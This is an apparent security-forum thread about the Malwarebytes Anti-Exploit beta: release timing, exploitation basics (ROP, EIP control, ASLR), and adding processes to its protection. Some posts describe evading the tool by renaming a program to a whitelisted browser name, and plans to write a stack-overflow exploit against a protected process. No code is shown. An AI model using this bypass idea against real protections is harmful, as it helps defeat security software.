Malwarebytes Anti-Exploit

Hey pbust, sorry if this has been asked/answered here recently, but do you have a target date for final release of MAE?

 

Not really.

A vulnerability is a weakness in a program. An exploit is code designed to make use of that weakness.

On XP all addresses are predictable so no additional vulnerabilities (known as information leaks in this case) are necessary for exploitation, at least a type of exploitation that relies on ROP.

What I'm saying is that when your program resides in the protected process address space and uses function hooking, knowing the addresses of the protector and protected functions will make bypassing much easier.

I don't study IT by the way. I study CS. I have a double major that includes computer security and that's certainly treated as IT though. I have a moderate amount of experience writing trivial exploits, like the ones that would work on an XP system. Just to clear things up there lol

 

Ahh, so you actually have written Some now ! Last year you said you would post a link to them, if/when you wrote any. I'm sure i'm not the only one who would like to test them, as i mentioned @ the time. Posting links to POC's is ok on here, so please do so

 

I suppose I could post them. They're basic exploits. EIP control in a piece of software that does nothing but take in user input and exit, essentially.

I am not at school and don't have access to it but I think I had a full 512B space for my shellcode and no need for ROP (binary not compiled with ASLR).

It is a Linux binary though.

 

Once we finish the engine we'll work on this.

Sorry, nothing set in stone yet.

If you do find something as described that works against MBAE please do post it.

 

Is there a way to manually add a process to MBAE's guard?

 

It would be awesome to add processes manually.

 

I think so to. Even if it is through the registry, so that we could test MBAE if it is compatible with other application.

 

The only way for now is to change the name of the process to one of the supported ones, i.e.:

iexplore.exe
chrome.exe
firefox.exe
opera.exe
winword.exe
excel.exe
... etc.

 

I am curious to know which processes do you want to add to MBAE. Don't get me wrong, I'd like to see this feature too, but you can hardly find a real exploit (not a proof of concept) that affects any program not already supported by MBAE.

At least MBAE is quite light on resources, I'm always in awe when I see people applying EMET to everything that runs, flies or swims.

 

Naive question, but what happens if a malware is saved with one of these filenames?
Signatures are not checked at all?

 

If a program uses simple filename whitelisting, yes.

 

That's easy enough.

 

I'm sure I could use a Firefox exploit or some other attack. But if I can just rename a 30 line program to firefox.exe and get shell that's much easier both for me and for users to recreate the attack.

 

I see what you are trying to accomplish. Other people want to add processes to gain protection and, frankly, it's difficult to find an exploit that is not designed for Java, Flash, Adobe, Office or some browser.

 

Just remember MBAE protects against RCE type exploits with the objective of preventing the exploit-driven infection/breach in the first place. So basically no priv escalation and other type of stuff. Once you are infected/breached it is game over anyway and outside the scope of MBAE.

Also you need to take into consideration that browsers include certain protections already and behave in a certain way, so creating a firefox.exe program which accepts a remote shell for example does not really proof anything.

But I think you know all this already.

 

This won't be payload driven, purely a protected process that will encounter a very basic stack overflow leading to control of EIP, which I'll point back into the buffer to execute my instructions.

It is not an API design issue or some such thing. It's by the books memory corruption. Don't worry I'll play fair.

 

The real deal is to create a buffer overflow situation which results in a predictable address to misuse, this is certainly not the case with ALL buffer overflows.

 

The real deal is pitting MBAE against new real-world exploits as they are released and therefore not previously known to MBAE. You can do this with ITW exploits and more reliably with exploits from Metasploit and older versions of MBAE.

We all know that no single software in the world is safe from a targeted attack to it, so attacking MBAE specifically does not proof anything about its exploit detection capabilities.

MBAE works by applying special techniques in multiple layers to the concept of "application families" such as browsers, media players, PDF readers, etc. based on the design of those applications, as opposed to EMET which is more generalist in nature in terms of applying mitigations to apps. An ad-hoc application called firefox.exe will obviously not behave like the real Firefox and will not be inline with the detection logic that MBAE applies to the real Firefox.

But I am looking forward to see what you develop since the devil is in the details.

 

I am not developing anything.

I am looking forward to the MBAE release which includes mail clients also (e.g. outlook). I have played with it and was impressed that injected DLL's were blocked in the browser. I know you can't claim invincibility but blocking specific behaviour patterns in vulnarable processes reduces the risk of exploits being exploitable on a specific configuration.

 

@MBAE,

This is how I feel. While detection logic such as "is it making an outbound connection" may trigger logic, and therefor be invalid for other programs, a buffer overflow is fairly generic.

But I'll just be posting the vulnerable code and how to exploit it. In terms of reverse engineering MBAE and bypassing it that's work for the summer, where they pay me for that sort of thing

Maybe GullibleJones will take it and run with it. He's pretty good with this stuff.

It is without ASLR. EIP control is pretty typical/ basic.

 

I opened both Office Word and Excel 2007 and MBAE beta .0250 wont protect them.

 

It does protect them but it doesn't show in the log. Known issue:
https://forums.malwarebytes.org/index.php?showtopic=135127

 

Thanks for info.

 

The newest MBAE 0.09.5.1000 BETA has been released.

https://forums.malwarebytes.org/index.php?showtopic=140718#entry780208